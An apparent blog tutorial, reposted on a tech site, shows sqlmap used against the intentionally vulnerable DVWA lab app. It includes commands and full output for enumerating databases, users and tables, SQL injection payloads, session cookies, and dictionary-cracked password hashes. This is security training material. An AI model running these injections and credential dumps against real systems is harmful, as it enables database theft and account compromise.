sql injection – sqlmap

最新推荐文章于 2025-03-12 10:42:18 发布
最新推荐文章于 2025-03-12 10:42:18 发布
阅读量2.1k 收藏
点赞数
分类专栏: 网络
本文介绍如何使用SQLMap这一开源渗透测试工具,自动化检测并利用SQL注入漏洞接管数据库服务器。涵盖获取数据库版本、名称、表名及列名等操作,并演示了如何通过SQLMap抓取cookie、查找用户及密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

backtrack 5r1

/pentest/database/sqlmap

To find SQL database version
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url

To Find SQL database Name
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs

To find database table names
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name

To find database columns
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --column -T table-name -D database-name

To see the data from database
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --column -T table-name -D database-name

grab cookie from tamperdata firefox plugin

root@bt:/pentest/database/sqlmap#./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 17:05:51

[17:05:52] [INFO] using ‘/pentest/database/sqlmap/output/IP-Address/session’ as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 8761=8761 AND ‘FczA’=’FczA&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘COXA’=’COXA&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1′ UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND ‘kmcR’=’kmcR&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1′ AND SLEEP(5) AND ‘qxrK’=’qxrK&Submit=Submit

[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file ‘/pentest/database/sqlmap/output/IP-Address/session’: information_schema, cdcol,  mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[17:05:52] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/IP-Address’

./sqlmap.py -u ‘http://IP-Address/?id=1&Submit=Submit#’ –cookie=’PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low’ –string=”Surname”  –users –password

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 11:07:20

[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'

[*] shutting down at: 11:07:22

dojo@dojo-vm:~/tools/sqlmap$

————————————————————–
updates
————————————————————–
Find database

Used tamperdata firefox plugin to get Cookie as bellow

Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3

reload the login page so get clean url /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:14:04

[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302

[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:14:24

————————————————————–
Find tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:27:40

[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:27:40

--------------------------------------------------------------
Find users

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:28:45

[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:28:45

--------------------------------------------------------------
Find passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:24:19

[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:24:30

http://www.myexploit.wordpress.com/web-application-webscarab/

————————————————————–

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note you can use online decrypter sites

MySQL4.1 uses sha1

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

sql注入漏洞--sqlmap使用
qq_43710889的博客
06-16 3000
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
SQL Injection4(sqlmap)
kid的博客
04-12 473
SQL Injection4(sqlmap) 前言 前面把手工注入算是简单的练习了一遍,这里来学习下sqlmap,感受下工具的强大。主要也是针对dvwa的sql注入和盲注用sqlmap再来一遍,然后试下文件的上传下载等功能。算是对sqlmap的一个入门吧。 参数 sqlmap的参数真的很多,下面这篇博客把所有sqlmap -hh的参数都进行了中文翻译,挺方便后面查阅的 超详细SQLMap使用攻略及...
第7章 漏洞映射
weixin_72849553的博客
12-28 1216
漏洞映射旨在识别和分析目标环境中的决定性安全缺陷,有时也称为脆弱性评估。它是一种在IT基础设施的安全控制中探寻已知弱点的分析方法,是脆弱性管理计划的一个关键组成部分。测试人员在完成了信息收集、目标识别和服务枚举的相关工作后,就可着手分析目标设施中可能存在的安全漏洞。安全漏洞可能导致目标系统发生安全事故,有害于业务系统的保密性、完整性和可用性。本章将要讨论安全漏洞的两种常见类型,阐述安全漏洞的各种分类标准,还会介绍Kali Linux系统提供的几款著名的脆弱性分析工具。这部分章节涵盖以下几个主题。
SQLMap渗透测试工具实战指南
weixin_42465140的博客
03-12 726
